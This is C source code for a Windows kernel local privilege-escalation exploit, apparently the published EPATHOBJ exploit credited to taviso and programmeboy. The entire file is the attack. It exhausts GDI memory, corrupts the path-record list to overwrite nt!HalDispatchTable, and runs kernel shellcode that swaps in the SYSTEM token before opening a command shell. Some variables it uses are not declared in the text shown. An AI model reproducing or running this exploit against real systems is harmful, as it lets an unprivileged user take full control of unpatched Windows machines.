#ifndef WIN32_NO_STATUS
# define WIN32_NO_STATUS
#endif
#include <stdio.h>
#include <stdarg.h>
#include <stddef.h>
#include <windows.h>
#include <assert.h>
#ifdef WIN32_NO_STATUS
# undef WIN32_NO_STATUS
#endif
#include <ntstatus.h>
#pragma comment(lib, "gdi32")
#pragma comment(lib, "kernel32")
#pragma comment(lib, "user32")
#pragma comment(lib, "shell32")
#pragma comment(linker, "/SECTION:.text,ERW")
#ifndef PAGE_SIZE
# define PAGE_SIZE 0x1000
#endif
#define MAX_POLYPOINTS (8192 * 3)
#define MAX_REGIONS 8192
#define CYCLE_TIMEOUT 10000
#define PD_BEGINSUBPATH 0x00000001
#define PD_ENDSUBPATH 0x00000002
#define PD_RESETSTYLE 0x00000004
#define PD_CLOSEFIGURE 0x00000008
#define PD_BEZIERS 0x00000010
typedef struct _POINTFIX
{
ULONG x;
ULONG y;
} POINTFIX, *PPOINTFIX;
// Approximated from reverse engineering.
typedef struct _PATHRECORD {
struct _PATHRECORD *next;
struct _PATHRECORD *prev;
ULONG flags;
ULONG count;
POINTFIX points[4];
} PATHRECORD, *PPATHRECORD;
PPATHRECORD PathRecord;
PATHRECORD ExploitRecord;
PPATHRECORD ExploitRecordExit;
enum { SystemModuleInformation = 11 };
enum { ProfileTotalIssues = 2 };
typedef struct _RTL_PROCESS_MODULE_INFORMATION {
HANDLE Section;
PVOID MappedBase;
PVOID ImageBase;
ULONG ImageSize;
ULONG Flags;
USHORT LoadOrderIndex;
USHORT InitOrderIndex;
USHORT LoadCount;
USHORT OffsetToFileName;
UCHAR FullPathName[256];
} RTL_PROCESS_MODULE_INFORMATION, *PRTL_PROCESS_MODULE_INFORMATION;
typedef struct _RTL_PROCESS_MODULES {
ULONG NumberOfModules;
RTL_PROCESS_MODULE_INFORMATION Modules[1];
} RTL_PROCESS_MODULES, *PRTL_PROCESS_MODULES;
FARPROC NtQuerySystemInformation;
FARPROC NtQueryIntervalProfile;
FARPROC PsReferencePrimaryToken;
FARPROC PsLookupProcessByProcessId;
PULONG HalDispatchTable;
ULONG HalQuerySystemInformation;
PULONG TargetPid;
PVOID *PsInitialSystemProcess;
// Search the specified data structure for a member with CurrentValue.
BOOL FindAndReplaceMember(PDWORD Structure,
DWORD CurrentValue,
DWORD NewValue,
DWORD MaxSize)
{
DWORD i, Mask;
// Microsoft QWORD aligns object pointers, then uses the lower three
// bits for quick reference counting.
Mask = ~7;
// Mask out the reference count.
CurrentValue &= Mask;
// Scan the structure for any occurrence of CurrentValue.
for (i = 0; i < MaxSize; i++) {
if ((Structure[i] & Mask) == CurrentValue) {
// And finally, replace it with NewValue.
Structure[i] = NewValue;
return TRUE;
}
}
// Member not found.
return FALSE;
}
// This routine is injected into nt!HalDispatchTable by EPATHOBJ::pprFlattenRec.
ULONG __stdcall ShellCode(DWORD Arg1, DWORD Arg2, DWORD Arg3, DWORD Arg4)
{
PVOID TargetProcess;
// Record that the exploit completed.
Finished = 1;
// Fix the corrupted HalDispatchTable,
HalDispatchTable[1] = HalQuerySystemInformation;
// Find the EPROCESS structure for the process I want to escalate
if (PsLookupProcessByProcessId(TargetPid, &TargetProcess) == STATUS_SUCCESS) {
PACCESS_TOKEN SystemToken;
PACCESS_TOKEN TargetToken;
// Find the Token object for my target process, and the SYSTEM process.
TargetToken = (PACCESS_TOKEN) PsReferencePrimaryToken(TargetProcess);
SystemToken = (PACCESS_TOKEN) PsReferencePrimaryToken(*PsInitialSystemProcess);
// Find the token in the target process, and replace with the system token.
FindAndReplaceMember((PDWORD) TargetProcess,
(DWORD) TargetToken,
(DWORD) SystemToken,
0x200);
}
return 0;
}
DWORD WINAPI WatchdogThread(LPVOID Parameter)
{
// Here we wait for the main thread to get stuck inside FlattenPath().
WaitForSingleObject(Mutex, CYCLE_TIMEOUT);
// It looks like we've taken control of the list, and the main thread
// is spinning in EPATHOBJ::bFlatten. We can't continue because
// EPATHOBJ::pprFlattenRec exit's immediately if newpathrec() fails.
// So first, we clean up and make sure it can allocate memory.
while (NumRegion) DeleteObject(Regions[--NumRegion]);
// Now we switch out the Next pointer for our exploit record. As soon
// as this completes, the main thread will stop spinning and continue
// into EPATHOBJ::pprFlattenRec.
InterlockedExchangePointer(&PathRecord->next,
&ExploitRecord);
return 0;
}
// I use this routine to generate a table of acceptable stub addresses. The
// 0x40 offset is the location of the PULONG parameter to
// nt!NtQueryIntervalProfile. Credit to progmboy for coming up with this clever
// trick.
VOID __declspec(naked) HalDispatchRedirect(VOID)
{
__asm inc eax
__asm jmp dword ptr [ebp+0x40]; // 0
__asm inc ecx
__asm jmp dword ptr [ebp+0x40]; // 1
__asm inc edx
__asm jmp dword ptr [ebp+0x40]; // 2
__asm inc ebx
__asm jmp dword ptr [ebp+0x40]; // 3
__asm inc esi
__asm jmp dword ptr [ebp+0x40]; // 4
__asm inc edi
__asm jmp dword ptr [ebp+0x40]; // 5
__asm dec eax
__asm jmp dword ptr [ebp+0x40]; // 6
__asm dec ecx
__asm jmp dword ptr [ebp+0x40]; // 7
__asm dec edx
__asm jmp dword ptr [ebp+0x40]; // 8
__asm dec ebx
__asm jmp dword ptr [ebp+0x40]; // 9
__asm dec esi
__asm jmp dword ptr [ebp+0x40]; // 10
__asm dec edi
__asm jmp dword ptr [ebp+0x40]; // 11
// Mark end of table.
__asm {
_emit 0
_emit 0
_emit 0
_emit 0
}
}
int main(int argc, char **argv)
{
HANDLE Thread;
HDC Device;
ULONG Size;
ULONG PointNum;
HMODULE KernelHandle;
PULONG DispatchRedirect;
PULONG Interval;
ULONG SavedInterval;
RTL_PROCESS_MODULES ModuleInfo;
LogMessage(L_INFO, "\r--------------------------------------------------\n"
"\rWindows NT/2K/XP/2K3/VISTA/2K8/7/8 EPATHOBJ local ring0 exploit\n"
"\r------------------- taviso () cmpxchg8b com, programmeboy () gmail com ---\n"
"\n");
NtQueryIntervalProfile = GetProcAddress(GetModuleHandle("ntdll"), "NtQueryIntervalProfile");
NtQuerySystemInformation = GetProcAddress(GetModuleHandle("ntdll"), "NtQuerySystemInformation");
Mutex = CreateMutex(NULL, FALSE, NULL);
DispatchRedirect = (PVOID) HalDispatchRedirect;
Interval = (PULONG) ShellCode;
SavedInterval = Interval[0];
TargetPid = GetCurrentProcessId();
LogMessage(L_INFO, "NtQueryIntervalProfile () %p", NtQueryIntervalProfile);
LogMessage(L_INFO, "NtQuerySystemInformation () %p", NtQuerySystemInformation);
// Lookup the address of system modules.
NtQuerySystemInformation(SystemModuleInformation,
&ModuleInfo,
sizeof ModuleInfo,
NULL);
LogMessage(L_DEBUG, "NtQuerySystemInformation() => %s () %p",
ModuleInfo.Modules[0].FullPathName,
ModuleInfo.Modules[0].ImageBase);
// Lookup some system routines we require.
KernelHandle = LoadLibrary(ModuleInfo.Modules[0].FullPathName + ModuleInfo.Modules[0].OffsetToFileName);
HalDispatchTable = (ULONG) GetProcAddress(KernelHandle, "HalDispatchTable") - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase;
PsInitialSystemProcess = (ULONG) GetProcAddress(KernelHandle, "PsInitialSystemProcess") - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase;
PsReferencePrimaryToken = (ULONG) GetProcAddress(KernelHandle, "PsReferencePrimaryToken") - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase;
PsLookupProcessByProcessId = (ULONG) GetProcAddress(KernelHandle, "PsLookupProcessByProcessId") - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase;
// Search for a ret instruction to install in the damaged HalDispatchTable.
HalQuerySystemInformation = (ULONG) memchr(KernelHandle, 0xC3, ModuleInfo.Modules[0].ImageSize)
- (ULONG) KernelHandle
+ (ULONG) ModuleInfo.Modules[0].ImageBase;
LogMessage(L_INFO, "Discovered a ret instruction at %p", HalQuerySystemInformation);
// Create our PATHRECORD in user space we will get added to the EPATHOBJ
// pathrecord chain.
PathRecord = VirtualAlloc(NULL,
sizeof *PathRecord,
MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE);
LogMessage(L_INFO, "Allocated userspace PATHRECORD () %p", PathRecord);
// You need the PD_BEZIERS flag to enter EPATHOBJ::pprFlattenRec() from
// EPATHOBJ::bFlatten(). We don't set it so that we can trigger an infinite
// loop in EPATHOBJ::bFlatten().
PathRecord->flags = 0;
PathRecord->next = PathRecord;
PathRecord->prev = (PPATHRECORD)(0x42424242);
LogMessage(L_INFO, " ->next @ %p", PathRecord->next);
LogMessage(L_INFO, " ->prev @ %p", PathRecord->prev);
LogMessage(L_INFO, " ->flags @ %u", PathRecord->flags);
// Now we need to create a PATHRECORD at an address that is also a valid
// x86 instruction, because the pointer will be interpreted as a function.
// I've created a list of candidates in DispatchRedirect.
LogMessage(L_INFO, "Searching for an available stub address...");
// I need to map at least two pages to guarantee the whole structure is
// available.
while (!VirtualAlloc(*DispatchRedirect & ~(PAGE_SIZE - 1),
PAGE_SIZE * 2,
MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE)) {
LogMessage(L_WARN, "\tVirtualAlloc(%#x) => %#x",
*DispatchRedirect & ~(PAGE_SIZE - 1),
GetLastError());
// This page is not available, try the next candidate.
if (!*++DispatchRedirect) {
LogMessage(L_ERROR, "No redirect candidates left, sorry!");
return 1;
}
}
LogMessage(L_INFO, "Success, ExploitRecordExit () %#0x", *DispatchRedirect);
// This PATHRECORD must terminate the list and recover.
ExploitRecordExit = (PPATHRECORD) *DispatchRedirect;
ExploitRecordExit->next = NULL;
ExploitRecordExit->prev = NULL;
ExploitRecordExit->flags = PD_BEGINSUBPATH;
ExploitRecordExit->count = 0;
LogMessage(L_INFO, " ->next @ %p", ExploitRecordExit->next);
LogMessage(L_INFO, " ->prev @ %p", ExploitRecordExit->prev);
LogMessage(L_INFO, " ->flags @ %u", ExploitRecordExit->flags);
// This is the second stage PATHRECORD, which causes a fresh PATHRECORD
// allocated from newpathrec to nt!HalDispatchTable. The Next pointer will
// be copied over to the new record. Therefore, we get
//
// nt!HalDispatchTable[1] = &ExploitRecordExit.
//
// So we make &ExploitRecordExit a valid sequence of instuctions here.
LogMessage(L_INFO, "ExploitRecord () %#0x", &ExploitRecord);
ExploitRecord.next = (PPATHRECORD) *DispatchRedirect;
ExploitRecord.prev = (PPATHRECORD) &HalDispatchTable[1];
ExploitRecord.flags = PD_BEZIERS | PD_BEGINSUBPATH;
ExploitRecord.count = 4;
LogMessage(L_INFO, " ->next @ %p", ExploitRecord.next);
LogMessage(L_INFO, " ->prev @ %p", ExploitRecord.prev);
LogMessage(L_INFO, " ->flags @ %u", ExploitRecord.flags);
LogMessage(L_INFO, "Creating complex bezier path with %x", (ULONG)(PathRecord) >> 4);
// Generate a large number of Belier Curves made up of pointers to our
// PATHRECORD object.
for (PointNum = 0; PointNum < MAX_POLYPOINTS; PointNum++) {
Points[PointNum].x = (ULONG)(PathRecord) >> 4;
Points[PointNum].y = (ULONG)(PathRecord) >> 4;
PointTypes[PointNum] = PT_BEZIERTO;
}
// Switch to a dedicated desktop so we don't spam the visible desktop with
// our Lines (Not required, just stops the screen from redrawing slowly).
SetThreadDesktop(CreateDesktop("DontPanic",
NULL,
NULL,
0,
GENERIC_ALL,
NULL));
// Get a handle to this Desktop.
Device = GetDC(NULL);
// Take ownership of Mutex
WaitForSingleObject(Mutex, INFINITE);
// Spawn a thread to cleanup
Thread = CreateThread(NULL, 0, WatchdogThread, NULL, 0, NULL);
LogMessage(L_INFO, "Begin CreateRoundRectRgn cycle");
// We need to cause a specific AllocObject() to fail to trigger the
// exploitable condition. To do this, I create a large number of rounded
// rectangular regions until they start failing. I don't think it matters
// what you use to exhaust paged memory, there is probably a better way.
//
// I don't use the simpler CreateRectRgn() because it leaks a GDI handle on
// failure. Seriously, do some damn QA Microsoft, wtf.
for (Size = 1 << 26; Size; Size >>= 1) {
while (Regions[NumRegion] = CreateRoundRectRgn(0, 0, 1, Size, 1, 1))
NumRegion++;
}
LogMessage(L_INFO, "Allocated %u HRGN objects", NumRegion);
LogMessage(L_INFO, "Flattening curves...");
for (PointNum = MAX_POLYPOINTS; PointNum && !Finished; PointNum -= 3) {
BeginPath(Device);
PolyDraw(Device, Points, PointTypes, PointNum);
EndPath(Device);
FlattenPath(Device);
FlattenPath(Device);
// Test if exploitation succeeded.
NtQueryIntervalProfile(ProfileTotalIssues, Interval);
// Repair any damage.
*Interval = SavedInterval;
EndPath(Device);
}
if (Finished) {
LogMessage(L_INFO, "Success, launching shell...", Finished);
ShellExecute(NULL, "open", "cmd", NULL, NULL, SW_SHOW);
LogMessage(L_INFO, "Press any key to exit...");
getchar();
ExitProcess(0);
}
// If we reach here, we didn't trigger the condition. Let the other thread know.
ReleaseMutex(Mutex);
WaitForSingleObject(Thread, INFINITE);
ReleaseDC(NULL, Device);
// Try again...
LogMessage(L_ERROR, "No luck, run exploit again (it can take several attempts)");
LogMessage(L_INFO, "Press any key to exit...");
getchar();
ExitProcess(1);
}
// A quick logging routine for debug messages.
BOOL LogMessage(LEVEL Level, PCHAR Format, ...)
{
CHAR Buffer[1024] = {0};
va_list Args;
va_start(Args, Format);
vsnprintf_s(Buffer, sizeof Buffer, _TRUNCATE, Format, Args);
va_end(Args);
switch (Level) {
case L_DEBUG: fprintf(stdout, "[?] %s\n", Buffer); break;
case L_INFO: fprintf(stdout, "[+] %s\n", Buffer); break;
case L_WARN: fprintf(stderr, "[*] %s\n", Buffer); break;
case L_ERROR: fprintf(stderr, "[!] %s\n", Buffer); break;
}
fflush(stdout);
fflush(stderr);
return TRUE;
}